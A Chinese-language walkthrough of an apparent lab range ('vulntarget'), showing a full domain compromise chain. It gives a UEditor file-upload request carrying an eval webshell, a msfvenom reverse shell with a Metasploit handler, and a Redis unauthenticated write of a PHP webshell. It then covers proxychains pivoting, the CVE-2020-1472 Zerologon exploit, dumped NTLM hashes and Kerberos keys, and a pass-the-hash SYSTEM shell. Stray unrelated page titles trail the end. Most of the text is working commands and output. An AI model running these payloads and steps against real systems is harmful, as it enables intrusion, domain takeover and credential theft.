win 7 权限
利用任意文件上传 getshell
POST /module/ueditor/php/action_upload.php?action=uploadfile HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; http://www.baidu.com/search/spider.html)
Accept: */*
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarymVk33liI64J7GQaK
Cache-Control: no-cache
Pragma: no-cache
Host: 192.168.159.129
Content-Length: 882------WebKitFormBoundarymVk33liI64J7GQaK
Content-Disposition: form-data; name="CONFIG[fileFieldName]"filename
------WebKitFormBoundarymVk33liI64J7GQaK
Content-Disposition: form-data; name="CONFIG[fileMaxSize]"10000
------WebKitFormBoundarymVk33liI64J7GQaK
Content-Disposition: form-data; name="CONFIG[filePathFormat]"R4g1729585588321
------WebKitFormBoundarymVk33liI64J7GQaK
Content-Disposition: form-data; name="CONFIG[fileAllowFiles][]".php
------WebKitFormBoundarymVk33liI64J7GQaK
Content-Disposition: form-data; name="mufile"submit
------WebKitFormBoundarymVk33liI64J7GQaK
Content-Disposition: form-data; name="filename"; filename="R4g1729585588321.php"R4g1729585588321<?php class Gz5SfY10 { public function __construct($H7Es8){ @eval("/*Z7y11Eib8N*/".$H7Es8.""); }}new Gz5SfY10($_REQUEST['cmd']);?>
------WebKitFormBoundarymVk33liI64J7GQaK--
当然工具直接梭哈也行
win 2016 权限
将 win7 上线 cs 备用
cs木马生成
设置监听器
生成 exe 的木马
用蚁剑传输后运行即可上线
redis 未授权 getshell
MSF上线
生成反向马
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.159.128 LPORT=5555 -f exe > /root/555.exe
通过蚁剑上传执行,msf 监听
┌──(root㉿kali)-[~]
└─# msfconsole msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.159.128
lhost => 192.168.159.128
msf6 exploit(multi/handler) > set lport 5555
lport => 5555
msf6 exploit(multi/handler) > run[*] Started reverse TCP handler on 192.168.159.128:5555
[*] Sending stage (176198 bytes) to 192.168.159.129
[*] Meterpreter session 1 opened (192.168.159.128:5555 -> 192.168.159.129:56385) at 2024-10-23 20:11:15 +0800meterpreter > ls
Listing: C:\tmp
===============Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100777/rwxrwxrwx 73802 fil 2024-10-23 20:06:58 +0800 555.exemeterpreter > bg
[*] Backgrounding session 1...
msf6 exploit(multi/handler) >
添加路由,设置代理,arp获取到内网同网段IP
msf6 auxiliary(server/socks_proxy) > use post/multi/manage/autoroutemsf6 post(multi/manage/autoroute) > set session 1
session => 1msf6 post(multi/manage/autoroute) > run
[*] Running module against WIN7-PC
[*] Searching for subnets to autoroute.
[*] Did not find any new subnets to add.
[*] Post module execution completedmsf6 post(multi/manage/autoroute) > optionsModule options (post/multi/manage/autoroute):Name Current Setting Required Description---- --------------- -------- -----------CMD autoadd yes Specify the autoroute command (Accepted: add, autoadd, print, delete, default)NETMASK 255.255.255.0 no Netmask (IPv4 as "255.255.255.0" or CIDR as "/24"SESSION 1 yes The session to run this module onSUBNET no Subnet (IPv4, for example, 10.10.10.0)View the full module info with the info, or info -d command.msf6 post(multi/manage/autoroute) > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > optionsModule options (auxiliary/server/socks_proxy):Name Current Setting Required Description---- --------------- -------- -----------SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or0.0.0.0 to listen on all addresses.SRVPORT 1080 yes The port to listen onVERSION 5 yes The SOCKS version to use (Accepted: 4a, 5)When VERSION is 5:Name Current Setting Required Description---- --------------- -------- -----------PASSWORD no Proxy password for SOCKS5 listenerUSERNAME no Proxy username for SOCKS5 listenerAuxiliary action:Name Description---- -----------Proxy Run a SOCKS proxy serverView the full module info with the info, or info -d command.msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 3.
[*] Starting the SOCKS proxy servermsf6 auxiliary(server/socks_proxy) > sessions -i 1
[*] Starting interaction with 1...meterpreter > arp aARP cache
=========IP address MAC address Interface---------- ----------- ---------10.0.20.1 00:50:56:c0:00:0b Intel(R) PRO/1000 MT Network Connection #210.0.20.99 00:0c:29:49:db:32 Intel(R) PRO/1000 MT Network Connection #210.0.20.254 00:50:56:f2:92:e5 Intel(R) PRO/1000 MT Network Connection #210.0.20.255 ff:ff:ff:ff:ff:ff Intel(R) PRO/1000 MT Network Connection #2192.168.159.1 00:50:56:c0:00:08 Intel(R) PRO/1000 MT Network Connection192.168.159.2 00:50:56:f4:36:2d Intel(R) PRO/1000 MT Network Connection192.168.159.128 00:0c:29:cc:f9:72 Intel(R) PRO/1000 MT Network Connection192.168.159.254 00:50:56:fe:c6:0b Intel(R) PRO/1000 MT Network Connection192.168.159.255 ff:ff:ff:ff:ff:ff Intel(R) PRO/1000 MT Network Connection224.0.0.22 00:00:00:00:00:00 Software Loopback Interface 1224.0.0.22 01:00:5e:00:00:16 Intel(R) PRO/1000 MT Network Connection224.0.0.22 01:00:5e:00:00:16 Intel(R) PRO/1000 MT Network Connection #2224.0.0.22 01:00:5e:00:00:16 Bluetooth ����(����������)224.0.0.252 00:00:00:00:00:00 Software Loopback Interface 1224.0.0.252 01:00:5e:00:00:fc Intel(R) PRO/1000 MT Network Connection224.0.0.252 01:00:5e:00:00:fc Intel(R) PRO/1000 MT Network Connection #2239.255.255.250 00:00:00:00:00:00 Software Loopback Interface 1239.255.255.250 01:00:5e:7f:ff:fa Intel(R) PRO/1000 MT Network Connection239.255.255.250 01:00:5e:7f:ff:fa Intel(R) PRO/1000 MT Network Connection #2255.255.255.255 ff:ff:ff:ff:ff:ff Intel(R) PRO/1000 MT Network Connection255.255.255.255 ff:ff:ff:ff:ff:ff Intel(R) PRO/1000 MT Network Connection #2255.255.255.255 ff:ff:ff:ff:ff:ff Bluetooth ����(����������)
更改配置
vi /etc/proxychains4.conf
代理之后,可以直接 redis 未授权访问
利用redis未授权以及php web环境来getshell
redis未授权漏洞写webshell
┌──(root㉿kali)-[~]
└─# proxychains redis-cli -h 10.0.20.99
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.0.20.99:6379 ... OK
10.0.20.99:6379> config set dir "C:/phpStudy/PHPTutorial/WWW/"
OK
10.0.20.99:6379> config set dbfilename tx.php
OK
10.0.20.99:6379> set 1 "<?php @eval($_POST['tx']);?>"
OK
10.0.20.99:6379> save
OK
10.0.20.99:6379>
写好shell之后,蚁剑设置代理连接
cs上线
右键 win7 选择转发上线
如图选择 payload 生成
设置完后会自动创建监听器,并自动开启监听
win2019 权限获取
msf 正向代理
通过代理启动 msf,注意只有通过代理(proxychains msfconsole)才能使流量正向到内网win2016上
┌──(root㉿kali)-[/zbug]
└─# proxychains msfconsole[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Metasploit tip: After running db_nmap, be sure to check out the result
of hosts and services
[proxychains] DLL init: proxychains-ng 4.17le.../
[proxychains] DLL init: proxychains-ng 4.17msf6 > use exploit/multi/handler
[proxychains] DLL init: proxychains-ng 4.17
[*] Using configured payload generic/shell_reverse_tcp
[proxychains] DLL init: proxychains-ng 4.17msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/bind_tcp
[proxychains] DLL init: proxychains-ng 4.17
payload => windows/x64/meterpreter/bind_tcp
[proxychains] DLL init: proxychains-ng 4.17msf6 exploit(multi/handler) > set lport 4444
[proxychains] DLL init: proxychains-ng 4.17
lport => 4444
[proxychains] DLL init: proxychains-ng 4.17msf6 exploit(multi/handler) > set rhost 10.0.20.99
[proxychains] DLL init: proxychains-ng 4.17
rhost => 10.0.20.99
[proxychains] DLL init: proxychains-ng 4.17msf6 exploit(multi/handler) > run
[proxychains] DLL init: proxychains-ng 4.17
[*] Started bind TCP handler against 10.0.20.99:4444
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.0.20.99:4444 <--socket error or timeout!
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.0.20.99:4444 ... OK
[*] Sending stage (201798 bytes) to 10.0.20.99
[proxychains] DLL init: proxychains-ng 4.17
[*] Meterpreter session 1 opened (127.0.0.1:59614 -> 127.0.0.1:1080) at 2025-03-09 15:30:20 +0800
[proxychains] DLL init: proxychains-ng 4.17meterpreter >
通过蚁剑运行即可
添加路由链
meterpreter > run post/multi/manage/autoroute
[proxychains] DLL init: proxychains-ng 4.17[*] Running module against WIN2016
[*] Searching for subnets to autoroute.
[+] Route added to subnet 10.0.20.0/255.255.255.0 from host's routing table.
[proxychains] DLL init: proxychains-ng 4.17meterpreter > run post/windows/gather/enum_domain
[proxychains] DLL init: proxychains-ng 4.17
[+] Domain FQDN: vulntarget.com
[+] Domain NetBIOS Name: VULNTARGET
[+] Domain Controller: win2019.vulntarget.com (IP: 10.0.10.110)
[proxychains] DLL init: proxychains-ng 4.17meterpreter > bg
[proxychains] DLL init: proxychains-ng 4.17
[*] Backgrounding session 1...
[proxychains] DLL init: proxychains-ng 4.17msf6 exploit(multi/handler) > use auxiliary/server/socks_proxy
[proxychains] DLL init: proxychains-ng 4.17msf6 auxiliary(server/socks_proxy) > set version 5
[proxychains] DLL init: proxychains-ng 4.17
version => 5
[proxychains] DLL init: proxychains-ng 4.17msf6 auxiliary(server/socks_proxy) > set srvport 1081
[proxychains] DLL init: proxychains-ng 4.17
srvport => 1081
[proxychains] DLL init: proxychains-ng 4.17msf6 auxiliary(server/socks_proxy) > options
[proxychains] DLL init: proxychains-ng 4.17Module options (auxiliary/server/socks_proxy):Name Current Setting Required Description---- --------------- -------- -----------SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.SRVPORT 1081 yes The port to listen onVERSION 5 yes The SOCKS version to use (Accepted: 4a, 5)When VERSION is 5:Name Current Setting Required Description---- --------------- -------- -----------PASSWORD no Proxy password for SOCKS5 listenerUSERNAME no Proxy username for SOCKS5 listenerAuxiliary action:Name Description---- -----------Proxy Run a SOCKS proxy serverView the full module info with the info, or info -d command.[proxychains] DLL init: proxychains-ng 4.17msf6 auxiliary(server/socks_proxy) > run
[proxychains] DLL init: proxychains-ng 4.17
[*] Auxiliary module running as background job 0.
[proxychains] DLL init: proxychains-ng 4.17[*] Starting the SOCKS proxy server
msf6 auxiliary(server/socks_proxy) > 这里配置完之后继续配置代理文件
vi /etc/proxychains4.conf
使用 nmap 测试是否连接成功
┌──(root㉿kali)-[/zbug]
└─# proxychains nmap -Pn -sT 10.0.10.110 -p6379,80,8080,445,139
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-09 18:56 CST
[proxychains] Strict chain ... 0.0.0.0:1080 ... 0.0.0.0:1081 ... 10.0.10.110:139 ... OK
[proxychains] Strict chain ... 0.0.0.0:1080 ... 0.0.0.0:1081 ... 10.0.10.110:8080 <--socket error or timeout!
[proxychains] Strict chain ... 0.0.0.0:1080 ... 0.0.0.0:1081 ... 10.0.10.110:80 <--socket error or timeout!
[proxychains] Strict chain ... 0.0.0.0:1080 ... 0.0.0.0:1081 ... 10.0.10.110:445 ... OK
[proxychains] Strict chain ... 0.0.0.0:1080 ... 0.0.0.0:1081 ... 10.0.10.110:6379 <--socket error or timeout!
Nmap scan report for 10.0.10.110
Host is up (0.14s latency).PORT STATE SERVICE
80/tcp closed http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
6379/tcp closed redis
8080/tcp closed http-proxyNmap done: 1 IP address (1 host up) scanned in 45.37 seconds
CVE-2020-1472利用
git clone https://github.com/dirkjanm/CVE-2020-1472.git
git clone https://github.com/SecureAuthCorp/impacket.git && cd impacket && pip3 install .
下载完成后,利用用 cve-2020-1472 漏洞将域控密码置空
┌──(root㉿kali)-[/zbug/CVE-2020-1472]
└─# proxychains python3 cve-2020-1472-exploit.py WIN2019 10.0.10.110 [proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Performing authentication attempts...
[proxychains] Strict chain ... 0.0.0.0:1080 ... 0.0.0.0:1081 ... 10.0.10.110:135 ... OK
[proxychains] Strict chain ... 0.0.0.0:1080 ... 0.0.0.0:1081 ... 10.0.10.110:49670 ... OK
=========================================================================================================================
Target vulnerable, changing account password to empty stringResult: 0Exploit complete!
使用 secretsdump.py 尝试获取 administrator 域控的 hash 值,此文件在 impacket/examples 目录下
┌──(root㉿kali)-[/zbug/impacket/examples]
└─# proxychains4 python3 secretsdump.py vulntarget.com/WIN2019\$@10.0.10.110 -just-dc -no-pass[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.13.0.dev0+20250307.160229.6e0a9691 - Copyright Fortra, LLC and its affiliated companies [proxychains] Strict chain ... 0.0.0.0:1080 ... 0.0.0.0:1081 ... 10.0.10.110:445 ... OK
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[proxychains] Strict chain ... 0.0.0.0:1080 ... 0.0.0.0:1081 ... 10.0.10.110:135 ... OK
[proxychains] Strict chain ... 0.0.0.0:1080 ... 0.0.0.0:1081 ... 10.0.10.110:49667 ... OK
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a3dd8e4a352b346f110b587e1d1d1936:::
vulntarget.com\win2016:1601:aad3b435b51404eeaad3b435b51404ee:dfc8d2bfa540a0a6e2248a82322e654e:::
WIN2019$:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WIN2016$:1602:aad3b435b51404eeaad3b435b51404ee:9630d035ba860e59ca7a51ea39a48e97:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:70a1edb09dbb1b58f1644d43fa0b40623c014b690da2099f0fc3a8657f75a51d
Administrator:aes128-cts-hmac-sha1-96:04c435638a00755c0b8f12211d3e88a1
Administrator:des-cbc-md5:dcc29476a789ec9e
krbtgt:aes256-cts-hmac-sha1-96:f7a968745d4f201cbeb73f4b1ba588155cfd84ded34aaf24074a0cfe95067311
krbtgt:aes128-cts-hmac-sha1-96:f401ac35dc1c6fa19b0780312408cded
krbtgt:des-cbc-md5:10efae67c7026dbf
vulntarget.com\win2016:aes256-cts-hmac-sha1-96:e4306bef342cd8215411f9fc38a063f5801c6ea588cc2fee531342928b882d61
vulntarget.com\win2016:aes128-cts-hmac-sha1-96:6da7e9e046c4c61c3627a3276f5be855
vulntarget.com\win2016:des-cbc-md5:6e2901311c32ae58
WIN2019$:aes256-cts-hmac-sha1-96:092c877c3b20956347d535d91093bc1eb16b486b630ae2d99c0cf15da5db1390
WIN2019$:aes128-cts-hmac-sha1-96:0dca147d2a216089c185d337cf643e25
WIN2019$:des-cbc-md5:01c8894f541023bc
WIN2016$:aes256-cts-hmac-sha1-96:9173b992970cde4cf92795ea2f57c82fc72752e261eb3f6db7fd385500da709a
WIN2016$:aes128-cts-hmac-sha1-96:2fdb26ae937ab6b24e0931ac928ab960
WIN2016$:des-cbc-md5:8cce51314fb95761
[*] Cleaning up...
成功获取
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15:::
相同目录下使用 smbexec.py 拿域控shell
┌──(root㉿kali)-[/zbug/impacket/examples]
└─# proxychains python3 smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15 administrator@10.0.10.110
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.13.0.dev0+20250307.160229.6e0a9691 - Copyright Fortra, LLC and its affiliated companies [proxychains] Strict chain ... 0.0.0.0:1080 ... 0.0.0.0:1081 ... 10.0.10.110:445 ... OK
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami
nt authority\system)
平台 | FISCO BCOS 应用案例)
:pytorch中 交叉熵损失详解:为什么logits比targets多一个维度?)
